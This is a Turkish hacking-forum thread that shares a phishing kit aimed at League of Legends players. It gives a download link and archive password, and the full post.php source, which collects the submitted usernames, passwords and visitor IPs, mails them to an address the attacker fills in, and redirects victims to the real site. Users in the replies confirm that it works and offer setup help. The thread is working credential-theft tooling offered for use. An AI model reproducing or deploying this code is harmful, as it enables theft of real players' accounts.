LoL Fake Script

28 Haz 2013
245
0
Merhaba, Onaylı LoL Hesabı Hackleme konumun kaldırılması üzerine LoL Fake Script'i paylaşmaya karar verdim. Ayrıca bir yetkili konumun neden kaldırıldığı hakkında bilgilendirirse çok mutlu olurum.

Dosya link: İndir league legends fak rar
Şifre: tht
Virüs total: https://www.virustotal.com/tr/file/...eb94afab8286010fe8e43297/analysis/1485772492/

post.php kodları;

Kod:
<?php 
$ip = getenv("REMOTE_ADDR"); 
$hostname = gethostbyaddr($ip); 
$message .= "-----------------|Account lol|-------------------\n"; 
$message .= "UserName :".$_POST['username']."\n"; 
$message .= "PassWord :".$_POST['password']."\n"; 
$message .= "-----------------|Account lol|-------------------\n"; 
$send="[email protected]"; 
$subject = "LOL INFO | $ip"; 
$headers = "From: LOL <[email protected]>"; 
mail($send,$subject,$message,$headers); 
header("********: http://eune.leagueoflegends.com/"); 
?>

Not: [email protected] yazan yere kendi mail adresinizi yazın.
******** yazan kısma Lo cation yazın. Boşluğu silin

Moderatör tarafında düzenlendi:

Rulling

Üye
8 Ocak 2017
85
0
Video veya görsel ile anlatım olsaydı bilmeyenler icon daha güzel olurdu. Eline sağlık

DreaT

Katılımcı Üye
8 Ocak 2017
345
2
arkadaşın dediği doğru videolu anlatım olsaydı daha açıklayıcı olabilirdi yinede eline sağlık

Crunkz

Katılımcı Üye
8 Ocak 2017
510
0
Ne alaka dostum? Bir iş yapıyorsunuz bari tam yapın. Gereksiz :)
gereksiz falan değil birader adam haklı yapabilen yapar yapamıyan araştırır yaptım makine gibi çalışıyor script boş boş hazıra konacağınıza az araştırın bir şeyleri sonra hekırım hekırım diye ortalıkta gezinmeyin.

ENİGMA1

Uzman üye
31 Ocak 2016
1,961
39
DENENDİ ÇALIŞIYOR.

b50c016ecf594274af2d59f98ab8275b.png

YAPAMAYAN ARKADAŞLAR ÖZELE GELEBİLİR TEAMVİEWER İLE YARDIM EDEBİLİRİM.​

borancesu

Yeni üye
2 Tem 2016
4
0
nasıl yapılıyor hocam ne diye aratınca anahtar kelime nedir yani bi anlatında herkes yararlansın..

Emre160703

Kıdemli Üye
12 Haz 2016
2,101
0
Localhost
Bi ara instagram scripti kurmuştum onunla aynı mı hocam? Ayrıca eune yazıyor o düzenliyceğimiz bölümde tr olarak değiştirmemiz gerekmiyor mu?

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.